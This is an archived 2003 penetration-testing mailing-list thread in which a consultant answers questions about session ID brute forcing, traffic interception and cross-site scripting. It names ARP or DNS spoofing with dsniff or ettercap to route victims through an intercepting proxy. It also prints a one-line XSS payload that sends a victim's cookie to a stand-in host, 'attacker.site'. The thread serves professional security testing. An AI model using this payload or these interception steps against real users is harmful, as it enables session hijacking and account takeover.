From: Dawes, Rogan (ZA - Johannesburg) (rdawes@deloitte.co.za)
Date: Fri Apr 11 2003 - 03:11:45 EDT
Hi,
As far as brute forcing session ids goes, you could have a look at a post
that I sent to the mobile code mailing list a while back for some
techniques, and some code. That was focused on identifying the patterns in
the cookie sequence, but once you have done that, it should be relatively
easy to identify what the possibilities are for the next cookie, simply by
reversing the algorithm - instead of calculating an integer from a character
string, calculate a character string from the integer.
http://www.pantek.com/library/general/lists/securityfocus.com/webappsec/msg0
0552.html
Alternatively, take a look at iDefense's cookie and sessionid brute force
tool. Sorry, I forget the name at the moment.
The key to intercepting traffic is to understand the tools that are
available, and put them to use in creative ways.
For example, you could use the arp spoofing or DNS spoofing tools from the
dsniff suite to redirect traffic on your local segment from the proxy to
your own machine. Alternatively, investigate ettercap which could also
possibly do this.
Then run something like WebSleuth, Exodus
(http://mysite.mweb.co.za/residents/rdawes/exodus.html), the dsniff webmitm
, or your favourite proxy program to monitor traffic sent to the proxy, and
alter it as you wish, prior to sending it off to the real proxy, or out via
the router.
Cross Site scripting is mostly useful to compromise the user's sessionid, to
save you the effort of brute forcing it. E.g. if you could get the victim to
execute the following code, you could simply collect their sessionid, and
use it yourself.
[script language=javascript]document.print("<img
src='http://attacker.site/snarf?" + document.cookie + "'>")[/script]
Alternatively, you could make them submit a form containing whatever
information you want, that could possibly elevate your own privileges (if
the victim is an administrator) etc
Have fun!
Rogan
-----Original Message-----
From: Indian Tiger [mailto:indiantiger@mailandnews.com]
Sent: 15 April 2003 08:06 PM
To: pen test
Subject: Proof of Concept Tool on Web Application Security
Hi all,
I have tried a lot to find any Proof of Concept Tool on Web Application
Security but still I am not able to find a single one. Let me give some
specific details.
Session ID
Generally session ID is big enough and act as authentication token. Most of
the time it only changes last few digits, lets say only three digits from
the end. Even its doing this only its very tuff to guess these last three
digits. I have made a testing site and tried but was not able to do that. I
knew session ID is not the only authentication parameter. It can contain
cookie, session tokens etc as well. I have tried Achilles, Web Sleuth, Web
Inspect, Spike Proxy etc. I think at least they don't do such brute force.
Is there any tool which does brute force on this and give session ID.
Cookie Manipulation
Several Articles talk about Cookie Manipulation. How to get cookies of
others even in a LAN seems very tuff or not possible as per my study on Web.
If a Attacker is able to redirect other person's traffic to any Proxy like
Achilles, Web Sleuth than he can perform attacks. Now nobody is allowing to
change his proxy setting and sending his output through Attacker (Proxy).
Is there any tool which can give access/manipulate the cookie remotely?
This manipulation can also be achieved if an Attacker can put his Proxy (Web
Sleuth) on intermediate Router/Proxy. One Example is I am accessing Hotmail
and on my ISP Router/Proxy, An attacker installs tool like Web Sleuth. But
again question comes Router works on OSI layer 3 so attacker can't put tool
like Web Sleuth. If intermediate hop is Proxy which is on Application level,
there should be some tool which can be placed here.
XSS
Cross Site Scripting has to use Client site scripting only. What could be
the maximum impact of this? Can Attacker format a machine or steal data by
this? If yes how?
Please also tell any other Proof of Concept Tool on Web Application
Security. I read OWASP guides, WebGoat and some more to understand three
things deeply and develop Proof of Concept Tool but no successes accept
Hidden field manipulation. Please recommend some good guides on this.
Any help on this would be highly appreciated.
Thanking You.
Sincerely,
Indian Tiger, CISSP
--------------------------------------------------------------
Costs are climbing and complaints are rising
as SPAM overloads your e-mail servers and Inboxes
SurfControl E-mail Filter puts the brakes on spam & viruses
and gives you the reports to prove it.
http://www.securityfocus.com/SurfControl-pen-test2
Download a free trial and see just
what's going in and out of your organization.
--------------------------------------------------------------
--------------------------------------------------------------
Costs are climbing and complaints are rising
as SPAM overloads your e-mail servers and Inboxes
SurfControl E-mail Filter puts the brakes on spam & viruses
and gives you the reports to prove it.
http://www.securityfocus.com/SurfControl-pen-test2
Download a free trial and see just
what's going in and out of your organization.
--------------------------------------------------------------
This archive was generated by hypermail 2.1.7 : Sat Apr 12 2008 - 10:53:32 EDT